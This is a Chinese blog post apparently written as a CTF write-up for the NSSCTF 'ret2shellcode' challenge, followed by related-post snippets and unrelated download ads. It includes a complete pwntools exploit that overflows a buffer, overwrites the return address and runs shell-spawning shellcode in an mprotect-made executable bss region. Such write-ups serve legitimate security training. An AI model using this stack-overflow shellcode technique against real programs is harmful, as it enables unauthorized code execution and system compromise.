nssctf ret2shellcode

原创 已于 2025-03-03 13:37:25 修改 · 213 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf

于 2025-03-03 13:37:04 首次发布

首先checksec一下,如下图

根据题目就可以知道,这道题考的是ret2shellcode了,注意一下这边nx保护是开启的,接着利用

ida分析一下附件,进入main函数分析如下

注意nx保护开启,所以这边的mprotect函数需要额外关注一下,进入buff观察看下

可以知道buff在bss段存储且我们知道地址,这边我们通过gdb调试,来查看经过mprotect函数后的

各段情况,断点打在0x401220,然后按n单步调试,期间可以通过vmmap,查看内存情况,可以

得到以下两张图的对比

我们知道buff在bss段,而且地址是0x4040a0也就是介于0x404000和0x405000之间,后面

可以看到该内存权限由rw变为了rwx,也就是可以执行了,那么这个时候注入的shellcode就可

以执行了,从而获取shell,exp如下

from pwn import *

context(log_level="debug",arch='amd64')

p = remote('node5.anna.nssctf.cn',27979)

shellcode=asm(shellcraft.sh())

buff_addr= 0x4040a0

bias = 0x100+0x8

payload = shellcode.ljust(bias,b'a')+p64(buff_addr)

p.sendline(payload)

p.interactive()

这边我来解释一下payload = shellcode.ljust(bias,b'a')  +p64(buff_addr) 这一行的意思,上面已经

定义好了shellcode和bias的值,大概意思就是,将shellcode左对齐补满bias个长度如果不够,就

用a填补上

大概攻击思路,read函数读入字符串,这边通过将shellcode存储到s数组中,然后再是溢出

将main函数的返回地址修改为buff的地址,由于main函数中会将s的内容复制给buff,所以

main函数运行结束后buff中会有shellcode,此时由于返回地址被覆盖为了buff的地址,此时

就会执行shellcode,攻击奏效,可以获得shell。。。

[第十五章][15.3.2 shellcode注入攻击]ret2shellcode+[NewStarCTF 公开赛赛道]ret2shellcode
Welcome To Myon'Blog !
04-30 663
[第十五章][15.3.2 shellcode注入攻击]ret2shellcode+[NewStarCTF 公开赛赛程序会直接输出 v4 的地址,我们将 shellcode 写到 v4,然后溢出返回到 v4 的地址即可。这里直接给了 buf 7 的权限,即可读可写可执行,那么 shellcode 肯定写到 buf 里。我们利用的溢出点在 v4,是第二次的 read,所以第一次随便输,第二次输入测偏移。拿到返回的报错地址:0x6161616161616168。偏移是 104,再提取一下 v4 的地址就可以了。
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2text和ret2shellcode
qq_41040989的博客
03-31 964
将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,一般用到。
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 630
(仅作为本人的学习笔记和心得 如有错误请多指教)
ret2text、ret2syscall、ret2shellcode 详解
a12sj_的博客
02-11 976
攻击类型核心思路依赖条件ret2text跳转到程序已有的代码片段存在可利用函数构造 ROP 链触发系统调用足够的 Gadgets向可执行内存写入并执行 Shellcode内存可写且可执行(NX关闭)根据题目环境和保护机制选择合适的方法,结合调试工具动态验证。时光匆匆,一篇博客又到了结尾处啦。
基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode
WdIg-2023的博客
01-30 1863
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2text,ret2libc,ret2syscall,ret2shellcode
(shellcode注入攻击)ret2shellcode-栈上的ret2shellcode
2401_83500274的博客
08-14 848
用64ida打开发现如下情况,他输出了v4的地址,然后shift+F12没有发现什么后面函数和bin/sh字样,所以我们可以考虑用栈上的ret2shellcode来写。v4_addr = int(r.recvline()[33:-1],16)#这里接受的是printf里的,并且进行了切片操作,使得位v4地址并且转换为10进制。ret2shellcode的题,大致为bss段上的和栈上的shellcode。生成64位的shellcode,接收v4的地址,利用ljust覆盖填充,返回v4的地址。
CTF-PWN-ret2shellcode全解
2301_79326514的博客
09-21 2538
可见字符的shellcode是在什么时候用到的呢,有些程序会对用户输入进行检测,让用户只能输入可见字符的时候,就可以用到这个攻击方法了,原理还是很简单的,利用汇编指令对应的ascll码写出来,所以如果要手写的话是要懂汇编的,如果有需要可以自行学习一下。如果我们要写的时候可以写。可以看到运行过这个函数以后,buf所在的0x4040A0也就变成了可读可写可执行了,所以我们把shellcode写入到buff中就可以进行执行了关于mprotect函数的具体使用我在前面一个文章中已经讲解的很详细了,大家可以去看看。
ret2shellcode
m0_68956519的博客
03-22 525
ret2shellcode,即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码,然后通过利用,让程序调到shellcode的地址后去执行(这是网上随便复制粘贴的)要我来看就是我们写入的内容能被存储在栈以外的地方,通过恶意构造数据并修改返回地址到恶意数据所在的地址,执行命令并获取权限。
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1037
CTF-wiki的注解:ret2shellcode
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 934
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
栈溢出实例--笔记二(ret2shellcode
一只青木呀
08-01 2460
栈溢出实例--笔记二(ret2shellcode)1、栈溢出含义及栈结构2、ret2shellcode基本思路3、实战一下3.1、二进制程序如下3.2、分析调试查看栈3.3、编写payload获取shell3.4、操作结果 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 2、ret2shellcode基本思路 ret2shellcode需要我们控制程序执行shellcode代码。即ret2shellcode的目标就是在栈上写入布局好的shellcode,利用ret-address返回到
信捷XC系列PLC主从通讯程序设计与实现——工业自动化控制核心技术
08-09
信捷XC系列PLC主从通讯程序的设计与实现方法。信捷XC系列PLC是一款高性能、高可靠性的可编程逻辑控制器,在工业自动化领域广泛应用。文中阐述了主从通讯的基本概念及其重要性,具体讲解了配置网络参数、编写程序、数据交换以及调试与测试四个主要步骤。此外,还探讨了该技术在生产线控制、仓储物流、智能交通等多个领域的应用实例,强调了其对系统效率和稳定性的提升作用。 适合人群:从事工业自动化控制的技术人员、工程师及相关专业学生。 使用场景及目标:适用于需要多台PLC协同工作的复杂工业控制系统,旨在提高系统的效率和稳定性,确保各设备间的数据交换顺畅无误。 其他说明:随着工业自动化的快速发展,掌握此类通信协议和技术对于优化生产流程至关重要。
Qt 5.12.4与Halcon构建视觉流程框架:编译与测试的成功实践
08-09
如何将Halcon视觉技术和Qt框架相结合,构建一个强大的视觉处理流程框架。文中首先阐述了选择Qt 5.12.4的原因及其优势,接着描述了框架的具体构建方法,包括利用Qt的跨平台特性和界面设计工具创建用户界面,以及用Halcon进行图像处理与识别。随后,文章讲解了编译过程中需要注意的关键步骤,如正确引入Halcon的头文件和库文件,并提供了一个简单的代码示例。最后,作者分享了测试阶段的经验,强调了确保系统在各种情况下都能正常工作的必要性。通过这次实践,证明了两者结合可以带来更高效、更稳定的视觉处理解决方案。 适合人群:具有一定编程经验的技术人员,尤其是对计算机视觉和图形界面开发感兴趣的开发者。 使用场景及目标:适用于希望深入了解Qt与Halcon集成应用的开发者,旨在帮助他们掌握从框架搭建到实际部署的全过程,从而提升自身技能水平。 阅读建议:读者可以在阅读过程中跟随作者的步伐逐步尝试相关操作,以便更好地理解和吸收所介绍的知识点和技术细节。
【CAD入门基础课程】1.4 AutoCAD2016 功能介绍.avi
最新发布
08-09
一、AutoCAD 2016的新增功能 版本演进: 从V1.0到2016版已更新数十次,具备绘图、编辑、图案填充、尺寸标注、三维造型等完整功能体系 界面优化: 新增暗黑色调界面:使界面协调深沉利于工作 底部状态栏整体优化:操作更实用便捷 硬件加速:效果显著提升运行效率 核心新增功能: 新标签页和功能区库:改进工作空间管理 命令预览功能:增强操作可视化 地理位置和实景计算:拓展设计应用场景 Exchange应用程序和计划提要:提升协同效率 1. 几何中心捕捉功能 新增选项: 在对象捕捉模式组中新增"几何中心"选项 可捕捉任意多边形的几何中心点 启用方法: 通过草图设置对话框→对象捕捉选项卡 勾选"几何中心(G)"复选框(F3快捷键启用) 2. 标注功能增强 DIM命令改进: 智能标注创建:基于选择的对象类型自动适配标注方式 选项显示优化:同时在命令行和快捷菜单中显示标注选项 应用场景: 支持直线、圆弧、圆等多种图形元素的智能标注 3. 打印输出改进 PDF输出增强: 新增专用PDF选项按钮 支持为位图对象添加超链接 可连接到外部网站和本地文件 操作路径: 快速访问工具栏→打印按钮→PDF选项对话框 4. 其他重要更新 修订云线增强: 支持创建矩形和多边形云线 新增虚拟线段编辑选项 系统变量: 新增多个控制新功能的系统变量
电力电子领域单相PWM整流模型的主电路与控制模块实现研究
08-09
内容概要:本文详细探讨了单相PWM整流模型的设计与实现,重点介绍了主电路和控制模块的具体实现方法。主电路作为整流模型的核心部分,涉及功率因数、电流稳定性和调节范围等因素,常采用全桥或多级整流等拓扑结构。控制模块则由PWM控制器、传感器和执行器组成,负责调节交流电源的输入,实现所需电压和电流波形。文中还强调了算法设计、硬件接口设计和参数调整与优化的重要性,指出这些因素对于提高整流效果和效率至关重要。 适合人群:从事电力电子领域的研究人员、工程师及相关专业的学生。 使用场景及目标:适用于希望深入了解单相PWM整流模型工作原理和技术细节的人群,旨在帮助他们掌握主电路和控制模块的设计要点,提升电力系统的稳定性和效率。 其他说明:文中提到的相关技术可以通过进一步查阅专业文献和技术资料获得更深入的理解。
这是sanllin的第一次尝试开发app,调用kimi的文本识别和图像识别
08-09
资源下载链接为: https://pan.quark.cn/s/39ff61edf06f 这是sanllin的第一次尝试开发app,调用kimi的文本识别和图像识别(最新、最全版本!打开链接下载即可用!)
电力电子领域中稳态电弧与直流电弧放电特性的COMSOL仿真研究 · 电弧放电
08-09
利用COMSOL软件对稳态电弧、直流电弧放电及等离子体进行仿真的研究。首先简述了电弧与等离子体的基本概念,接着分别从稳态电弧的模拟与分析、直流电弧放电的模拟与探讨、等离子体的模拟与特性分析三个方面展开讨论。通过设定不同的边界条件和材料属性,模拟并分析了电弧的形态、电流密度分布、温度场变化等关键参数,揭示了影响电弧稳定性的因素。同时,通过对等离子体的模拟,进一步理解了其物理特性及其在工业生产中的应用,如等离子切割和喷涂等。 适合人群:从事电力电子领域研究的技术人员、高校相关专业师生、对电弧及等离子体感兴趣的科研工作者。 使用场景及目标:适用于希望深入了解稳态电弧、直流电弧放电及等离子体特性及其应用的研究人员和技术人员。目标是通过仿真手段掌握这些现象的工作机制,为实际工程应用提供理论支持和技术指导。 其他说明:文中提到的COMSOL是一款多物理场仿真软件,能够精确地模拟复杂的物理现象,对于理解和优化电力电子设备的设计具有重要意义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值